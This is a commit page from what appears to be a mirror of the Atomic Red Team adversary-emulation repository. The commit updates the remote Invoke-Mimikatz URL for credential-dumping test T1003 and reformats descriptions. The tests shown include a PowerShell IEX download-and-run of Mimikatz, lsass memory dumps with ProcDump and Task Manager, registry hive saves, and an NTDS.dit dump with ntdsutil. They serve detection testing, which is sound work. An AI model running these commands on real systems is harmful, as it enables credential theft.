security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update t1003 url (#405)

Browse Source 
* update url

* Generate docs from job=validate_atomics_generate_docs branch=Update-T1003-url
This commit is contained in:
caseysmithrc
2019-02-06 11:52:11 -07:00
committed by Zac Brown
parent a69319c513
commit a53eb4d327
3 changed files with 45 additions and 41 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003/T1003.md
+8 -8
View File
@@ -162,7 +162,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
#### Run it with `powershell`!
```
@@ -219,7 +219,7 @@ reg save HKLM\security security
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
**Supported Platforms:** Windows
@@ -238,7 +238,7 @@ procdump.exe -accepteula -ma lsass.exe #{output_file}
<br/>
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
@@ -246,11 +246,11 @@ Manager and administrative permissions.
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -261,7 +261,7 @@ Manager and administrative permissions.
<br/>
## Atomic Test #7 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
@@ -287,8 +287,8 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
<br/>
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
atomics/T1003/T1003.yaml
+9 -9
View File
@@ -12,7 +12,7 @@ atomic_tests:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
@@ -58,7 +58,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
@@ -74,7 +74,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
@@ -82,11 +82,11 @@ atomic_tests:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -95,7 +95,7 @@ atomic_tests:
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
@@ -118,8 +118,8 @@ atomic_tests:
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
@@ -131,4 +131,4 @@ atomic_tests:
executor:
name: command_prompt
command: |
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
atomics/index.yaml
+28 -24
View File
@@ -13445,7 +13445,7 @@ credential-access:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
@@ -13492,9 +13492,9 @@ credential-access:
reg save HKLM\system system
reg save HKLM\security security
- name: Dump LSASS.exe Memory using ProcDump
description: "The memory of lsass.exe is often dumped for offline credential
theft attacks. This can be achieved with Sysinternals \nProcDump. The tool
may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.\n"
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
input_arguments:
@@ -13508,25 +13508,28 @@ credential-access:
'
- name: Dump LSASS.exe Memory using Windows Task Manager
description: "The memory of lsass.exe is often dumped for offline credential
theft attacks. This can be achieved with the Windows Task \nManager and administrative
permissions.\n"
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
steps: "1. Open Task Manager:\n On a Windows system this can be accomplished
by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
\n on the task bar and selecting \"Task Manager\".\n\n2. Select lsass.exe:\n
\ If lsass.exe is not visible, select \"Show processes from all users\".
This will allow you to observe execution of lsass.exe \n and select it
for manipulation.\n\n3. Dump lsass.exe memory:\n Right-click on lsass.exe
in Task Manager. Select \"Create Dump File\". The following dialog will
show you the path to the saved file.\n"
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Offline Credential Theft With Mimikatz
description: "The memory of lsass.exe is often dumped for offline credential
theft attacks. Adversaries commonly perform this offline analysis with \nMimikatz.
This tool is available at https://github.com/gentilkiwi/mimikatz.\n"
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
@@ -13546,11 +13549,10 @@ credential-access:
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
- name: Dump Active Directory Database with NTDSUtil
description: "The Active Directory database NTDS.dit may be dumped using NTDSUtil
for offline credential theft attacks. This capability \nuses the \"IFM\" or
\"Install From Media\" backup functionality that allows Active Directory restoration
or installation of \nsubsequent domain controllers without the need of network-based
replication.\n"
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
input_arguments:
@@ -13560,7 +13562,9 @@ credential-access:
default: C:\Atomic_Red_Team
executor:
name: command_prompt
command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q'
command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
'
T1081:
technique:
id: attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c